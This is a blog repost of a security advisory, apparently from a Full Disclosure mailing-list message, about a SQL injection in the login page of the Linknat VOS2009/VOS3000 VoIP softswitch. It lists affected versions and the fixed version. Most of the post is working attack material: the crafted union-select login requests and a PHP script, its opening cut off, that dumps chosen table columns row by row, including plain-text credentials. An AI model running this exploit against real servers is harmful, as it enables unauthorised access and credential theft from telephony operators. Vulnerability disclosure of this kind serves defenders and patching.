Latest YouTube Video

Monday, May 23, 2016

[FD] Linknat VOS2009/VOS3000 SQL injection

A SQL injection was found in Linknat VOS3000/VOS2009, a popular VoIP softswitch, that could allow remote attackers to gain access to the credentials stored in plain-text. Application: Linknat VOS3000/VOS2009 Versions Affected: 2.1.1.5, 2.1.1.8, 2.1.2.0 Vendor URL: http://www.linknat.com/ Bug: SQLi (with DBA privileges) Type: Remote Resolution: Fixed, upgrade to 2.1.2.4 Reference: WooYun-2015-145458 - http://ift.tt/22m55Sc The SQLi reported is time-based blind. Since it is not an in-band SQLi, the results can be gathered from the output of welcome.jsp during the same session. (1st request) POST http://target/eng/login.jsp PARAM loginType=1 name=' union select 1,2,@@version,'hello',5,6# pass=' OR ''=' (2nd request during the same session) GET http://target/eng/welcome.jsp RESULT 0|' union select 1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00| [ EXPLOIT CODE ] 0) { foreach ( $post as $key => $value) $post_items[] = $key . '=' . urlencode($value); $post_string = implode('&', $post_items); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string); } $data = curl_exec($curl); curl_close($curl); return $data; } function query($host, $query) { $data = curl("http://$host/eng/login.jsp", array( "loginType" => 1, "name" => "' union " . $query . "#", "pass" => "' OR ''='" ), null, true); preg_match_all('|Set-Cookie: (.*);|U', $data, $matches); $cookies = implode('; ', $matches[1]); $data = curl("http://$host/eng/welcome.jsp", array(), $cookies, false); $parts = explode("|", trim($data)); if (count($parts) < 7) return false; return array($parts[3], $parts[4]); } function ascii_table($data) { $keys = array_keys(end($data)); $wid = array_map('strlen', $keys); foreach($data as $row) { foreach(array_values($row) as $k => $v) $wid[$k] = max($wid[$k], strlen($v)); } foreach($wid as $k => $v) { $fmt[$k] = "%-{$v}s"; $sep[$k] = str_repeat('-', $v); } $fmt = '| ' . implode(' | ', $fmt) . ' |'; $sep = '+-' . implode('-+-', $sep) . '-+'; $buf = array($sep, vsprintf($fmt, $keys), $sep); foreach($data as $row) { $buf[] = vsprintf($fmt, $row); $buf[] = $sep; } return implode("\n", $buf); } banner(); echo "\n"; echo "Target: $host\n"; echo "Column #1: $column_one\n"; echo "Column #2: $column_two\n"; echo "Table: $table\n"; echo "Other: $other\n"; echo "\n"; $results = array(); $count_result = query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table $other"); if ($count_result) { $count = intval($count_result[0]); echo "Found $count rows...\n"; for ($i=0; $i<$count; $i++) { $q = "SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table $other LIMIT " . $i . ",1"; $result = query($host, $q); if ($result) { echo "R" . ($i+1) . "]\t" . $column_one . " = " . hex2bin($result[0]) . ", " . $column_two . " = " . hex2bin($result[1]) . "\n"; } else { echo "Error retrieving row " . ($i+1) . "\n"; } $results[] = array($column_one => hex2bin($result[0]), $column_two => hex2bin($result[1])); } if (count($results) > 0) { echo "\n\n" . ascii_table($results) . "\n"; } } else { echo "Error retrieving row count"; } ?> -- Osama Khalid

Source: Gmail -> IFTTT-> Blogger
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)